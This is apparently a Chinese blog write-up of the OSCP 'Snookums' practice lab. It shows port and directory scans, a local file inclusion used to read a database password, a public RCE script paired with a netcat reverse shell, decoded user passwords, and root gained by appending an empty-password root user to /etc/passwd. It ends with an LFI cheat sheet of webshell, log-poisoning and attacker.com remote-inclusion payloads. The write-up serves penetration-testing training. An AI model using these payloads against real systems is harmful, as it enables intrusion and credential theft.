Home
avatar

静静

OSCP官方靶场 Snookums WP

一点 0分钟 渗透测试

关注泷羽Sec泷羽Sec-静安公众号,这里会定期更新与 OSCP、渗透测试等相关的最新文章,帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开靶场

信息收集

# Kali攻击机地址
192.168.45.238
# 靶机地址
192.168.236.58

扫描端口和目录

# 设置MTU
sudo ip link set dev tun0 mtu 1250
ip link show tun0
# 扫描端口
ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.236.58 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
# 扫描服务
sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.58
sudo nmap --script=vuln -p$ports -Pn 192.168.236.58
# 扫描目录
gobuster dir -e -u http://192.168.236.58 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
whatweb http://192.168.236.58/

扫描结果如下:


┌──(kali㉿kali)-[~/Desktop]
└─$ echo $ports
21,22,80,111,139,445,3306

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 23:01 EDT
Nmap scan report for 192.168.236.58
Host is up (0.30s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.2
22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 4a:79:67:12:c7:ec:13:3a:96:bd:d3:b4:7c:f3:95:15 (RSA)
|   256 a8:a3:a7:88:cf:37:27:b5:4d:45:13:79:db:d2:ba:cb (ECDSA)
|_  256 f2:07:13:19:1f:29:de:19:48:7c:db:45:99:f9:cd:3e (ED25519)
80/tcp   open  http        Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Simple PHP Photo Gallery
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
3306/tcp open  mysql       MySQL (unauthorized)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X|5.X (97%), MikroTik RouterOS 7.X (89%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.14 (97%), Linux 3.13 - 4.4 (91%), Linux 3.8 - 3.16 (91%), Linux 2.6.32 - 3.13 (91%), Linux 3.4 - 3.10 (91%), Linux 4.15 - 5.19 (91%), Linux 5.0 - 5.14 (91%), Linux 2.6.32 - 3.10 (90%), Linux 4.15 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SNOOKUMS; OS: Unix

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.62 seconds


┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.236.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 23:06 EDT
Nmap scan report for 192.168.236.58
Host is up (1.5s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
| http-internal-ip-disclosure:
|_  Internal IP Leaked: 127.0.0.1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.'
| http-sql-injection:
|   Possible sqli for queries:
|     http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
|   /README.txt: Interesting, a readme.
|   /css/: Potentially interesting folder w/ directory listing
|   /icons/: Potentially interesting folder w/ directory listing
|   /images/: Potentially interesting folder w/ directory listing
|_  /js/: Potentially interesting folder w/ directory listing
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql

Host script results:
| smb-vuln-regsvc-dos:
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|
|     Disclosure date: 2009-09-08
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103

Nmap done: 1 IP address (1 host up) scanned in 266.35 seconds

http://192.168.236.58/index.php            (Status: 200) [Size: 2730]
http://192.168.236.58/images               (Status: 301) [Size: 237] [--> http://192.168.236.58/images/]
http://192.168.236.58/image.php            (Status: 200) [Size: 1508]
http://192.168.236.58/photos               (Status: 301) [Size: 237] [--> http://192.168.236.58/photos/]
http://192.168.236.58/css                  (Status: 301) [Size: 234] [--> http://192.168.236.58/css/]
http://192.168.236.58/license.txt          (Status: 200) [Size: 18511]
http://192.168.236.58/db.php               (Status: 200) [Size: 0]
http://192.168.236.58/README.txt           (Status: 200) [Size: 4041]
http://192.168.236.58/js                   (Status: 301) [Size: 233] [--> http://192.168.236.58/js/]

┌──(kali㉿kali)-[~/Desktop]
└─$ whatweb http://192.168.236.58/
http://192.168.236.58/ [200 OK] Apache[2.4.6], Country[RESERVED][ZZ], Google-Analytics[UA-2196019-1], HTML5, HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[192.168.236.58], JQuery[1.7.2], Lightbox, PHP[5.4.16], Script, Title[Simple PHP Photo Gallery], X-Powered-By[PHP/5.4.16]

80端口打开网页是一个相册,鼠标悬停在图片上可以在右下角看到图片的地址。,能判断有一个image文件夹。 文件夹没有什么特别的发现。 Nmap的扫描结果发现有个README.txt文件,读取一下 

==========================
 Simple PHP Photo Gallery
==========================

Copyright John Caruso 2005-2008
https://sourceforge.net/projects/simplephpgal/


A) Embedded Gallery or Standalone
==================================
You can embed the gallery into existing pages or use it as a standalone page.

To use it as a Standalone page, just follow the instructions in steps (B) and (C).

To use it as an embedded Gallery in an existing page:
1) Copy the the code from the embeddedGallery.php file (or just use an include("embeddedGallery.php") statement in your existing php file).
2) Follow step (B) with the following modifications
        * B.1) The gallery title will not be taken from the folder name, but rather the config file. Make sure to uncomment the $galleryTitle = "title"; line and place your desired title in the quotes.
        * B.2) Do not include index.php when copying the files from the .zip file
        * C.2) Do not include index.php if you want to create your own index page. Just include the embeddedGallery.php file in your own script

B) Steps to setup your photogallery.
====================================

1) Create a new folder with the name that you would like your gallery title to be.
        * use the underscore "_" for spaces (eg. My_Vacation)
        * you can only use characters that are allowable for folder names
2) Put all the files contained in this .zip file into the folder you just created
3) If they do not already exist, create two folders named 'phpGallery_thumbs' and 'phpGallery_images' inside your folder. You will need WRITE permissions on the phpGallery_thumbs directory.
4) Put all of the photos that you want displayed in your gallery into the phpGallery_images folder
        * by default they will be displayed in alphabetical order. This can be modified in the phpGalleryConfig.php file by setting the $sortMode variable at the bottom of the file
5) Upload your directory to your website.
        * The first time you view the gallery it will take some time to load because thumbnails are being generated (If the page times out and nothing is shown on the screen, refresh the page. You may need to do this several times if you have a lot of images)


C) For Multiple Photo Galleries
================================
If you want to create multiple photo galleries:

1) Create a folder with the name that you would like your gallery listing to have.
        * use the underscore "_" for spaces (eg. My_Galleries)
        * you can only use characters that are allowable for folder names
2) Place the index.php, embeddedGallery.php and phpGalleryConfig.php files from this .zip file into the folder
3) Do the steps in (A) for as many galleries as you want to display, and place them into the folder you created in the previous step



D) Modifying the Style
=======================
Every element in the gallery script is attached to a CSS class.

If you are using the gallery as an embedded gallery, copy and paste the CSS classes/elements from the phpGalleryStyle.css file and paste them into your current stylesheet. I have tried to make the names as unique as possible.

If you are using the gallery as a standalone page, you can make your modifications directly to the phpGalleryStyle.css file.





NOTE:

i) Your webserver must have PHP version 3.0 or higher, and GD 2.0 or higher installed in order for the gallery software to work.
        To check this, create a php file with the line <?php phpinfo(); ?> and run it to see what modules are installed.

ii) Should work for JPG, JPEG, PNG and GIF files (for both upper and lowercase file extensions)

iii) Feel free to remove the copyright information (I agree it is quite ugly), under the condition that you aren't going to try to break what the copyright is intended to protect :)

iv) Have fun and enjoy!

Oh and if you don't mind, drop me a line at simplephpgallery@gmail.com with the URL to your website that you are using the gallery script on. I enjoy seeing how something I've done has helped out someone else! 

---翻译

好的,这是您提供的“Simple PHP Photo Gallery”文档的中文翻译(纯文字格式):

Simple PHP Photo Gallery


版权 John Caruso 2005-2008
https://sourceforge.net/projects/simplephpgal/

A) 嵌入式图库或独立图库

您可以将图库嵌入到现有页面中,或者将其用作独立页面。

作为独立页面使用: 只需按照步骤 (B) 和 (C) 中的说明操作即可。

作为嵌入式图库在现有页面中使用:

    1.  复制 embeddedGallery.php 文件中的代码(或者直接在您现有的 PHP 文件中使用 include("embeddedGallery.php") 语句)。
    2.  按照步骤 (B) 操作,但需进行以下修改:
           B.1) 图库标题将不再取自文件夹名称,而是取自配置文件。请确保取消注释 $galleryTitle  "title"; 这一行,并将您想要的标题放在引号内。

           B.2) 从 .zip 文件中复制文件时,不要包含 index.php。

    3.  (C.2) 如果您想创建自己的索引页,不要包含 index.php。只需在您自己的脚本中包含 embeddedGallery.php 文件。

B) 设置您的照片图库的步骤

1.  创建一个新文件夹,名称即为您想要的图库标题。
       使用下划线 "_" 表示空格(例如:My_Vacation)。

       只能使用文件夹名称允许的字符。

2.  将本 .zip 文件中包含的所有文件放入您刚刚创建的文件夹中。
3.  如果不存在,在您的文件夹内创建两个名为 phpGallery_thumbs 和 phpGallery_images 的文件夹。您需要对 phpGallery_thumbs 目录具有写入 (WRITE) 权限。
4.  将所有想要在图库中显示的照片放入 phpGallery_images 文件夹中。
       默认情况下,它们将按字母顺序显示。可以通过修改 phpGalleryConfig.php 文件底部的 $sortMode 变量来更改此行为。

5.  将您的目录上传到您的网站。
       第一次查看图库时,加载可能需要一些时间,因为正在生成缩略图(如果页面超时且屏幕上没有任何显示,请刷新页面。如果您有很多图像,可能需要多次刷新)。

C) 创建多个照片图库

如果您想创建多个照片图库:

1.  创建一个文件夹,名称即为您想要的图库列表标题。
       使用下划线 "_" 表示空格(例如:My_Galleries)。

       只能使用文件夹名称允许的字符。

2.  将本 .zip 文件中的 index.php、embeddedGallery.php 和 phpGalleryConfig.php 文件放入此文件夹。
3.  按照 (A) 部分的步骤操作,创建您想要显示的任意多个图库,并将它们放入上一步创建的文件夹中。

D) 修改样式

图库脚本中的每个元素都关联着一个 CSS 类。

嵌入式图库: 复制 phpGalleryStyle.css 文件中的 CSS 类/元素,并将其粘贴到您当前的样式表中。我尽量使类名唯一。

独立页面图库: 可以直接修改 phpGalleryStyle.css 文件。

注意 (NOTE):

i)  您的 Web 服务器必须安装 PHP 3.0 或更高版本以及 GD 2.0 或更高版本,图库软件才能工作。
       要检查这一点,创建一个包含 <?php phpinfo(); ?> 行的 PHP 文件并运行它,查看安装了哪些模块。

ii) 应支持 JPG, JPEG, PNG 和 GIF 文件(文件扩展名大小写均可)。

iii) 可以自由删除版权信息(我同意它不太美观),条件是您不会试图破坏版权旨在保护的内容 :)

iv) 祝您使用愉快!

哦,如果您不介意,请发邮件到 simplephpgallery@gmail.com 告诉我您使用该图库脚本的网站 URL。我很高兴看到我做的东西帮助了别人!

发现这个PHP相册有用include的方式来展现图片,文字中 “或者直接在您现有的 PHP 文件中使用 include(“embeddedGallery.php”) 语句)“这一句说明了,存在文件包含。搜索一下网上这个文件包含的利用方法如下。

[!question] 文件包含漏洞有哪些用法

文件包含漏洞

http://192.168.236.58/image.php?img=php://filter/convert.base64-encode/resource=/etc/passwd

http://192.168.236.58/image.php?img=php://filter/convert.base64-encode/resource=/var/www/html/db.php

<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?

得到数据库用户名和密码,观察端口发现3306端口打开,尝试登录发现不允许外部地址登录。

[!success] 数据库密码 root MalapropDoffUtilize1337

从Whatweb的结果中看,这是一个 Simple PHP Photo Gallery 的相册框架,搜索相关的漏洞发现有脚本可以利用。

https://github.com/beauknowstech/SimplePHPGal-RCE.py

# 终端1
rlwrap -cAr nc -nlvp 445
# 终端2
git clone https://github.com/beauknowstech/SimplePHPGal-RCE.py.git
cd SimplePHPGal-RCE.py
python3 SimplePHPGal-RCE.py http://192.168.236.58/ 192.168.45.238 445
python -c 'import pty;pty.spawn("/bin/bash")'

注意这里最好是用靶机以及开放打开的端口,比如这里的445端口。

内网信息收集

现在就可以登录数据库了

解码两次密码得到:

usernamepassword解码第二次解码
joshVFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0=TW9iaWxpemVIaXNzU2VlZHRpbWU3NDc=MobilizeHissSeedtime747
michaelU0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==SG9ja1N5ZG5leUNlcnRpZnkxMjM=HockSydneyCertify123
serenaVDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ==T3ZlcmFsbENyZXN0TGVhbjAwMA==OverallCrestLean000

home文件夹下只有一个用户文件夹michael,尝试用数据库中得到的密码su一下用户。 拿到第一个flag。 搜一下常见的提权点,并未发现常见的可以提权的点 查看是否还有其他可用的用户时发现passwd文件当前用户Micheal即可写入,那么直接写一个新用户,新的管理员用户即可。 

echo 'root2::0:0::/root:/bin/bash' >> /etc/passwd
su root2

拿到第二个flag

总结

入侵路径示意图

flowchart TD
    %% 资产列表
    A[Kali攻击机 <br> 192.168.45.238]
    B[靶机       <br> 192.168.236.58]
    C[获取数据库密码]
    D[获取apache终端]
    E[获取michael用户密码并登录]
    F[root]

    %% 路径关系
    A-->|扫描|B
    B-->|文件包含漏洞|C
    B-->|SimplePHPG漏洞|D
    C-->|数据库解码|E
    D-->E
    E-->|/etc/passwd权限配置不当|F
    


	%% 线型:---(实线)、-.->(虚线)、==>(粗箭头)
	%% -->|是|:带条件文本的连接
	%% 矩形节点[ ],菱形决策节点{ },圆弧方节点()
    %% 样式定义
    classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
    classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
    classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
    %% 线型与颜色方案(亮色/暗色通用)
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 

    %% 应用样式
    class A attack;
    class B,C,D public;
    class E,F internal;

入侵时间表

gantt
    title 攻击时间表
    dateFormat  YYYY-MM-DD HH:mm
    axisFormat  %H:%M
    
    section 侦察阶段
    目标扫描           :a1, 2025-08-20 11:4, 2025-08-20 12:30
    漏洞识别           :a2, after a1, 2025-08-20 13:03
    
    section 攻击阶段
    初始访问           :b1, after a2, 2025-08-20 13:20
    权限提升           :crit,b2, after b1, 3m
    
    section 后渗透阶段
    数据窃取           :c1, after b2, 1m

文件包含漏洞(LFI/RFI)

文件包含漏洞(LFI/RFI)的核心在于利用动态文件加载机制,通过控制包含路径参数实现敏感文件读取或恶意代码执行。以下是常见利用方式及技术细节,按协议和场景分类整理:

📁 ​​一、本地文件包含(LFI)基础利用​

  1. ​敏感文件读取​
    • ​路径遍历​​:通过../跳转目录读取系统文件。
      • ?file=../../../../etc/passwd→ 泄露用户账户信息 。
      • Windows 系统:?file=../../Windows/win.ini→ 获取系统配置 。
    • ​空字节截断​​(PHP <5.3.4):
      • ?file=../../../etc/passwd%00→ 绕过后缀限制(如.php)。
  2. ​日志文件注入​
    • ​污染日志​​:在请求头中注入恶意代码(如User-Agent: <?php system($_GET['cmd']);?>)。
    • ​包含日志​​:?file=/var/log/apache2/access.log&cmd=id→ 执行注入的代码 。
  3. ​Session 文件利用​
    • 注入恶意 Session:通过登录表单设置PHPSESSID=evil并提交username=<?php system('id');?>
    • 包含 Session 文件:?file=/tmp/sess_evil→ 执行代码 。

🌐 ​​二、伪协议高级利用​

🔧 ​​1. php://filter(源码泄露)​

  • ​Base64 编码读取​​:避免 PHP 代码直接执行。
    • ?file=php://filter/convert.base64-encode/resource=config.php→ 获取配置文件 Base64 编码内容 。
  • ​编码绕过技巧​​:
    • 多重过滤器:?file=php://filter/convert.iconv.UTF-8.UTF-16/resource=index.php→ 绕过简单过滤 。

⚡ ​​2. php://input(代码执行)​

  • ​POST 请求执行代码​​:需allow_url_include=On
    • ?file=php://input+ POST Body:<?php system('id');?>→ 直接执行系统命令 。
  • ​写入 Webshell​​: 
    <?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd]);?>'); ?>
    通过包含触发写入 。

📦 ​​3. 压缩协议(绕过上传限制)​

  • 上传含恶意代码的shell.zip(内部含shell.php),重命名为image.jpg
  • ?file=zip:///path/to/image.jpg%23shell.php→ 解压并执行代码 。
  • 类似zip://,额外支持反序列化攻击 。

💥 ​​4. data://(直接代码执行)​

  • ​嵌入 PHP 代码​​:需allow_url_include=On
    • ?file=data://text/plain,<?php phpinfo();?>→ 直接输出phpinfo
  • ​Base64 编码绕过​​:
    • ?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+→ 执行编码后的代码 。

🎯 ​​三、远程文件包含(RFI)​

  1. ​远程加载恶意文件​

    • ?file=http://attacker.com/shell.txt→ 包含远程服务器上的 Webshell(需allow_url_include=On)。
    • ​绕过技巧​​:添加?%23截断后缀:
      • ?file=http://attacker.com/shell.txt%23→ 忽略本地追加的后缀(如.php)。

  2. ​结合 DNS 重绑定​

    • 使同一 URL 在不同时间解析到攻击者服务器和本地文件,绕过 IP 限制 。

⚙️ ​​四、环境变量与临时文件​

  1. /proc/self/environ利用​
    • 通过User-Agent注入代码:
      • User-Agent: <?php system($_GET['cmd']);?>
      • ?file=/proc/self/environ&cmd=id→ 执行注入命令 。
  2. ​临时文件包含​
    • 结合文件上传漏洞,包含上传的临时文件路径(如/tmp/phpXXXXXX)。

🛠️ ​​五、绕过过滤技巧​

  • ​双写绕过​​:?file=....//....//etc/passwd→ 应对str_replace("../", "")过滤 。
  • ​绝对路径绕过​​:?file=file:///etc/passwd→ 直接指定绝对路径 。
  • ​长度截断​​:超长文件名(Windows >256字符,Linux >4096字符)自动截断后缀 。

💎 ​​总结​

文件包含漏洞的利用核心在于​​控制输入路径​​和​​利用协议特性​​:

  • ​敏感信息泄露​​ → php://filter+ Base64 编码。
  • ​代码执行​​ → php://input/data://+ POST 代码注入。
  • ​绕过限制​​ → 压缩协议(zip:///phar://)或路径遍历技巧。 防御需结合​​白名单验证​​、​​协议禁用​​(如allow_url_include=Off)和​​输入过滤​​ 。

🔔 想要获取更多网络安全与编程技术干货?

关注 泷羽Sec-静安 公众号,与你一起探索前沿技术,分享实用的学习资源与工具。我们专注于深入分析,拒绝浮躁,只做最实用的技术分享!💻

马上加入我们,共同成长!🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词,获取更多技术资料与书单推荐!📚

渗透测试 OSCP